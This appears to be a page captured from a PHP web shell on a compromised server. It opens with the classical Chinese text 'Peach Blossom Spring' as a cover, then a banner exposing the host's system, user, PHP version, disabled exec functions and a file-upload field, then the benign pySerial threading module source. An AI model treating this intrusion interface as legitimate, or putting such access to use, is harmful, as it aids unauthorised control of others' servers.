晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /proc/self/root/usr/lib/python3.6/site-packages/serial/threaded/ |
Upload File : |
#!/usr/bin/env python3
#
# Working with threading and pySerial
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C) 2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
"""\
Support threading with serial ports.
"""
import serial
import threading
class Protocol(object):
"""\
Protocol as used by the ReaderThread. This base class provides empty
implementations of all methods.
"""
def connection_made(self, transport):
"""Called when reader thread is started"""
def data_received(self, data):
"""Called with snippets received from the serial port"""
def connection_lost(self, exc):
"""\
Called when the serial port is closed or the reader loop terminated
otherwise.
"""
if isinstance(exc, Exception):
raise exc
class Packetizer(Protocol):
"""
Read binary packets from serial port. Packets are expected to be terminated
with a TERMINATOR byte (null byte by default).
The class also keeps track of the transport.
"""
TERMINATOR = b'\0'
def __init__(self):
self.buffer = bytearray()
self.transport = None
def connection_made(self, transport):
"""Store transport"""
self.transport = transport
def connection_lost(self, exc):
"""Forget transport"""
self.transport = None
super(Packetizer, self).connection_lost(exc)
def data_received(self, data):
"""Buffer received data, find TERMINATOR, call handle_packet"""
self.buffer.extend(data)
while self.TERMINATOR in self.buffer:
packet, self.buffer = self.buffer.split(self.TERMINATOR, 1)
self.handle_packet(packet)
def handle_packet(self, packet):
"""Process packets - to be overridden by subclassing"""
raise NotImplementedError('please implement functionality in handle_packet')
class FramedPacket(Protocol):
"""
Read binary packets. Packets are expected to have a start and stop marker.
The class also keeps track of the transport.
"""
START = b'('
STOP = b')'
def __init__(self):
self.packet = bytearray()
self.in_packet = False
self.transport = None
def connection_made(self, transport):
"""Store transport"""
self.transport = transport
def connection_lost(self, exc):
"""Forget transport"""
self.transport = None
self.in_packet = False
del self.packet[:]
super(FramedPacket, self).connection_lost(exc)
def data_received(self, data):
"""Find data enclosed in START/STOP, call handle_packet"""
for byte in serial.iterbytes(data):
if byte == self.START:
self.in_packet = True
elif byte == self.STOP:
self.in_packet = False
self.handle_packet(self.packet)
del self.packet[:]
elif self.in_packet:
self.packet.append(byte)
else:
self.handle_out_of_packet_data(byte)
def handle_packet(self, packet):
"""Process packets - to be overridden by subclassing"""
raise NotImplementedError('please implement functionality in handle_packet')
def handle_out_of_packet_data(self, data):
"""Process data that is received outside of packets"""
pass
class LineReader(Packetizer):
"""
Read and write (Unicode) lines from/to serial port.
The encoding is applied.
"""
TERMINATOR = b'\r\n'
ENCODING = 'utf-8'
UNICODE_HANDLING = 'replace'
def handle_packet(self, packet):
self.handle_line(packet.decode(self.ENCODING, self.UNICODE_HANDLING))
def handle_line(self, line):
"""Process one line - to be overridden by subclassing"""
raise NotImplementedError('please implement functionality in handle_line')
def write_line(self, text):
"""
Write text to the transport. ``text`` is a Unicode string and the encoding
is applied before sending ans also the newline is append.
"""
# + is not the best choice but bytes does not support % or .format in py3 and we want a single write call
self.transport.write(text.encode(self.ENCODING, self.UNICODE_HANDLING) + self.TERMINATOR)
class ReaderThread(threading.Thread):
"""\
Implement a serial port read loop and dispatch to a Protocol instance (like
the asyncio.Protocol) but do it with threads.
Calls to close() will close the serial port but it is also possible to just
stop() this thread and continue the serial port instance otherwise.
"""
def __init__(self, serial_instance, protocol_factory):
"""\
Initialize thread.
Note that the serial_instance' timeout is set to one second!
Other settings are not changed.
"""
super(ReaderThread, self).__init__()
self.daemon = True
self.serial = serial_instance
self.protocol_factory = protocol_factory
self.alive = True
self._lock = threading.Lock()
self._connection_made = threading.Event()
self.protocol = None
def stop(self):
"""Stop the reader thread"""
self.alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.join(2)
def run(self):
"""Reader loop"""
if not hasattr(self.serial, 'cancel_read'):
self.serial.timeout = 1
self.protocol = self.protocol_factory()
try:
self.protocol.connection_made(self)
except Exception as e:
self.alive = False
self.protocol.connection_lost(e)
self._connection_made.set()
return
error = None
self._connection_made.set()
while self.alive and self.serial.is_open:
try:
# read all that is there or wait for one byte (blocking)
data = self.serial.read(self.serial.in_waiting or 1)
except serial.SerialException as e:
# probably some I/O problem such as disconnected USB serial
# adapters -> exit
error = e
break
else:
if data:
# make a separated try-except for called used code
try:
self.protocol.data_received(data)
except Exception as e:
error = e
break
self.alive = False
self.protocol.connection_lost(error)
self.protocol = None
def write(self, data):
"""Thread safe writing (uses lock)"""
with self._lock:
self.serial.write(data)
def close(self):
"""Close the serial port and exit reader thread (uses lock)"""
# use the lock to let other threads finish writing
with self._lock:
# first stop reading, so that closing can be done on idle port
self.stop()
self.serial.close()
def connect(self):
"""
Wait until connection is set up and return the transport and protocol
instances.
"""
if self.alive:
self._connection_made.wait()
if not self.alive:
raise RuntimeError('connection_lost already called')
return (self, self.protocol)
else:
raise RuntimeError('already stopped')
# - - context manager, returns protocol
def __enter__(self):
"""\
Enter context handler. May raise RuntimeError in case the connection
could not be created.
"""
self.start()
self._connection_made.wait()
if not self.alive:
raise RuntimeError('connection_lost already called')
return self.protocol
def __exit__(self, exc_type, exc_val, exc_tb):
"""Leave context: close port"""
self.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# test
if __name__ == '__main__':
# pylint: disable=wrong-import-position
import sys
import time
import traceback
#~ PORT = 'spy:///dev/ttyUSB0'
PORT = 'loop://'
class PrintLines(LineReader):
def connection_made(self, transport):
super(PrintLines, self).connection_made(transport)
sys.stdout.write('port opened\n')
self.write_line('hello world')
def handle_line(self, data):
sys.stdout.write('line received: {}\n'.format(repr(data)))
def connection_lost(self, exc):
if exc:
traceback.print_exc(exc)
sys.stdout.write('port closed\n')
ser = serial.serial_for_url(PORT, baudrate=115200, timeout=1)
with ReaderThread(ser, PrintLines) as protocol:
protocol.write_line('hello')
time.sleep(2)
# alternative usage
ser = serial.serial_for_url(PORT, baudrate=115200, timeout=1)
t = ReaderThread(ser, PrintLines)
t.start()
transport, protocol = t.connect()
protocol.write_line('hello')
time.sleep(2)
t.close()